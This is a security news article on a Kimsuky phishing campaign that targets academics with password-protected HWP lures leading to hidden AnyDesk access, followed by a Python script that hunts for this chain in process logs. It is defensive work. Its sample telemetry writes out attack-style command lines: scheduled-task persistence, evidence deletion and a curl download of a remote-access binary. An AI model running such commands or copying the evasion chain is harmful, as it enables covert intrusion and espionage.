A newly uncovered malware campaign by North Korea-linked threat group Kimsuky is targeting academic institutions using a sophisticated blend of social engineering and technical stealth. The campaign leverages password-protected Hangul Word Processor (HWP) documents disguised as research review requests to deliver malware and establish persistent access to compromised systems.

The campaign was identified by South Korea’s AhnLab Security Emergency Response Center (ASEC), which described it as a “highly coordinated operation exploiting the academic community’s trust-based communication.” The phishing emails appear to come from real professors or institutions and often include documents tied to sensitive topics like the Russo-Ukrainian war.

“This campaign stands out for its clever use of legitimate academic practices to bypass conventional security filters,” said an ASEC analyst in their June 14 report. “Password-protected documents naturally appear more trustworthy and are harder for scanners to analyze.”

Once the recipient opens the file with the password supplied in the email, the HWP document's embedded OLE objects drop six components, among them reconnaissance scripts and a benign-looking decoy document that keeps the victim from suspecting anything. Execution is user-triggered: a hyperlink in the document labeled “More…” launches a chain that deletes evidence of the drop, registers scheduled tasks for persistence, and quietly downloads the legitimate remote access tool AnyDesk. Because the file is encrypted with a password the scanner does not have, mail gateways and sandboxes see only ciphertext, which is why this lure sails past conventional filters.

“The attackers went so far as to configure AnyDesk to be invisible to end-users,” noted ASEC. “This level of stealth shows their intent to remain in these networks long-term.”
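The chain described above (a document viewer spawning a script, a scheduled task pointing into the user's profile, a cleanup `del`, a download, and AnyDesk running from a user-writable directory rather than Program Files) is visible in ordinary process-creation telemetry. The following hunt script is an added example, not ASEC's code or any part of the report: the simplified key=value log layout, the `Hwp.exe` image name, and every path and PID in the sample records are assumptions or constructed data, not campaign indicators.

```python
"""Hunt process-creation telemetry for a document-to-AnyDesk chain.
Added example; the log format, the Hwp.exe image name and all sample paths
below are assumptions/constructed data, not indicators from the ASEC report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    path: str      # full image path as logged
    image: str     # lower-cased file name, e.g. "schtasks.exe"
    cmdline: str


# Simplified Sysmon-like layout: pid=.. ppid=.. image=<path> cmd="<command line>"
EVENT_RE = re.compile(
    r'pid=(?P<pid>\d+)\s+ppid=(?P<ppid>\d+)\s+image=(?P<path>.+?)\s+cmd="(?P<cmd>[^"]*)"'
)

DOC_VIEWERS = {"hwp.exe"}  # Hangul Word Processor; assumed image name
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|programdata|public)\\", re.I)
DELETE_RE = re.compile(r"\b(del|erase)\b", re.I)
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")


def parse_event(line: str) -> ProcEvent:
    m = EVENT_RE.search(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    path = m.group("path")
    image = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return ProcEvent(int(m.group("pid")), int(m.group("ppid")), path, image, m.group("cmd"))


def has_ancestor(ev: ProcEvent, by_pid: Dict[int, ProcEvent], names: Set[str],
                 max_depth: int = 8) -> bool:
    """Walk the parent chain (bounded, so PID reuse cannot loop forever)."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return False
        if parent.image in names:
            return True
        cur = parent
    return False


def classify(ev: ProcEvent, from_doc: bool) -> List[str]:
    """Return every reason this event matches the document-to-AnyDesk chain."""
    reasons = []
    if from_doc and ev.image in SCRIPT_HOSTS:
        reasons.append("script host launched under document viewer")
    if from_doc and ev.image in DOWNLOADERS:
        reasons.append("download utility launched under document viewer")
    if from_doc and DELETE_RE.search(ev.cmdline):
        reasons.append("file deletion under document viewer (evidence cleanup)")
    if (ev.image == "schtasks.exe" and "/create" in ev.cmdline.lower()
            and (from_doc or USER_WRITABLE.search(ev.cmdline))):
        reasons.append("scheduled task created from document chain or pointing into a user-writable path")
    if ev.image == "anydesk.exe" and not ev.path.lower().startswith(TRUSTED_PREFIXES):
        reasons.append("AnyDesk running outside Program Files")
    return reasons


def find_suspicious(lines: List[str]) -> List[Tuple[int, str]]:
    events = [parse_event(l) for l in lines if l.strip()]
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        from_doc = has_ancestor(ev, by_pid, DOC_VIEWERS)
        for reason in classify(ev, from_doc):
            findings.append((ev.pid, reason))
    return findings


# Constructed telemetry: one infection chain (pids 1000-1050) plus two benign events.
SAMPLE_EVENTS = [
    r'pid=1000 ppid=800 image=C:\Program Files\Hnc\Hwp.exe cmd="Hwp.exe C:\Users\kim\Downloads\review_request.hwp"',
    r'pid=1010 ppid=1000 image=C:\Windows\System32\cmd.exe cmd="cmd.exe /c C:\Users\kim\AppData\Local\Temp\run.bat"',
    r'pid=1020 ppid=1010 image=C:\Windows\System32\schtasks.exe cmd="schtasks.exe /create /sc minute /mo 10 /tn Update /tr C:\Users\kim\AppData\Roaming\svc.bat"',
    r'pid=1030 ppid=1010 image=C:\Windows\System32\cmd.exe cmd="cmd.exe /c del /f /q C:\Users\kim\AppData\Local\Temp\run.bat"',
    r'pid=1040 ppid=1010 image=C:\Windows\System32\curl.exe cmd="curl.exe -s -o C:\Users\kim\AppData\Roaming\AnyDesk.exe https://example.invalid/a.exe"',
    r'pid=1050 ppid=1010 image=C:\Users\kim\AppData\Roaming\AnyDesk.exe cmd="AnyDesk.exe"',
    r'pid=2000 ppid=800 image=C:\Program Files (x86)\AnyDesk\AnyDesk.exe cmd="AnyDesk.exe"',
    r'pid=2010 ppid=900 image=C:\Windows\System32\schtasks.exe cmd="schtasks.exe /create /sc daily /tn Backup /tr C:\Program Files\Backup\backup.exe"',
]

if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

On the constructed sample the two benign records (a properly installed AnyDesk and an admin-created backup task) produce no findings, while every process descending from the document viewer is flagged. Anchoring the rules on ancestry rather than on a single parent-child pair matters here because the interesting processes (schtasks, the downloader, AnyDesk) are grandchildren of Hwp.exe, not children. In a real estate, the AnyDesk rule needs an allow-list for sanctioned IT use, and the "invisible" configuration ASEC describes is best confirmed by checking where the binary lives and which task or service starts it, since the tool itself is legitimate and signed.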

The campaign’s implications are far-reaching. As academic networks often connect with government agencies and private research partners, successful infiltrations could lead to widespread data leaks and espionage.

Google’s Threat Analysis Group has also flagged the Kimsuky group as “a persistent and well-resourced APT targeting geopolitically sensitive sectors,” reinforcing the urgency of this threat.